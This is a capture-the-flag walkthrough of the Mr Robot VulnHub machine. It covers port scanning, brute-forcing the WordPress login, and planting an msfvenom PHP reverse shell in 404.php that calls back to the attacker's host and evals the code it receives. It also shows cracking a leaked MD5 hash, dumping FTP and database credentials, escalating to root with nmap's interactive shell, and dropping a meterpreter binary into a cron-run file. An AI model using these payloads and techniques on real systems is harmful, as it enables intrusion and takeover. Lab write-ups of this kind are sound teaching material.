Mr Robot

This is my write-up for Mr Robot vm on vulnhub

Link To Vulnhub

As usual we start with a good old nmap scan 🙂

nmap 192.168.0.97 -A -p - -T5

Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-01 20:00 EDT
Nmap scan report for linux (192.168.0.97)
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:38:35:A7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms linux (192.168.0.97)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.40 seconds

Checking the robots.txt revealed a dictionary and the first key.

User-agent: *
fsocity.dic
key-1-of-3.txt

curl 192.168.0.97/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

wget 192.168.0.97/fsocity.dic

Because the dictionary have multiple entry i needed to sort it and remove the duplicate

cat fsocity.dic | sort -u > fsociety.lst

There is a web server running we start dirb and nikto to learn more about the web servers.

We can see there is a wordpress running on the server.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsocity.dic --username user 

I first used user as the user to bruteforce because on the website it say welcome to user’s wordpress.

But since it didnt work i had to think about different user this wordpress would have, since the name of the vm is Mr Robot and the main character of Mr Robot is called Elliot, i had to try with this user also.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsociety.lst --username Elliot

Brute Forcing 'Elliot' Time: 00:02:54  (5636 / 11452) 49.21%  ETA: 00:03:00
  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | Elliot |      | ER28-0652 |
  +----+--------+------+-----------+

We can now login in the wordpress and change the content of 404.php to any php code of our liking
I used this php code which is generate by msfvenom


/*<?php /**/ error_reporting(0); $ip = '192.168.0.181'; $port = 443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

curl 192.168.0.97/404.php

Get a shell as the user deamon

with the shell we can see the user robot in /home/robot
ls -larth
total 16K
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
-r——– 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r–r– 1 robot robot 39 Nov 13 2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
a quick google search with the hash gives us http://md5cracker.org/decrypted-md5-hash/c3fcd3d76192e4007dfb496cca67e13b

so we can switch user with su robot
password is abcdefghijklmnopqrstuvwxyz

from enumerating the system we can see there is a config file for the server with the database password in it, and the ftp user and password.
define(‘FS_METHOD’, ‘ftpext’);
define(‘FTP_BASE’, ‘/opt/bitnami/apps/wordpress/htdocs/’);
define(‘FTP_USER’, ‘bitnamiftp’);
define(‘FTP_PASS’, ‘inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a’);
define(‘FTP_HOST’, ‘127.0.0.1’);
define(‘FTP_SSL’, false);

and the database configuration

/** The name of the database for WordPress */
define(‘DB_NAME’, ‘bitnami_wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘bn_wordpress’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘570fd42948’);

/** MySQL hostname */
define(‘DB_HOST’, ‘localhost:3306’);

With the ftp user i can read and write as the user but that didn’t help me get a root shell even tho there is a crontab running that use the bitnami user for it.

What ended me the root shell is i realized i was using nmap as a non root user but nmap still run as root!
nmap got an interactive option that can grant you a shell to get it just type.

nmap –interactive
!sh
There we got the root shell! 🙂

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# whoami
whoami
root

Thank you for reading this 🙂

nmap installed on the box and user robot is allowed to scan with it, so i did a bunch of scans locally to discover that there is an ftp service running on the box.

nc -v

nc -v 127.0.0.1 21
nc -v 127.0.0.1 21
Connection to 127.0.0.1 21 port [tcp/ftp] succeeded!
220 (vsFTPd 3.0.2)
USER bitnamiftp
USER bitnamiftp
331 Please specify the password.
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
230 Login successful.
CWD bitnami
CWD bitnami
250 Directory successfully changed.
CWD stats
CWD stats
550 Failed to change directory.
CWD /opt/bitnami/stats
CWD /opt/bitnami/stats
250 Directory successfully changed.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,41,198).
LIST -l
LIST -l
150 Here comes the directory listing.
226 Directory send OK.
STOR ./agent.bin
STOR ./agent.bin
425 Use PORT or PASV first.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,138,47).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
425 Failed to establish connection.

PASV
PASV
227 Entering Passive Mode (127,0,0,1,34,208).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
150 Ok to send data.
226 Transfer complete.
421 Timeout.
nc -v 127.0.0.1 35375 < /tmp/vipermeter.elf
#This will transfer the vipermeter.elf to agent.bin with is executed in the crontab at every hours finishing ith 55 minutesx

to get a shell as root
nmap –interactive
!sh

Advertisements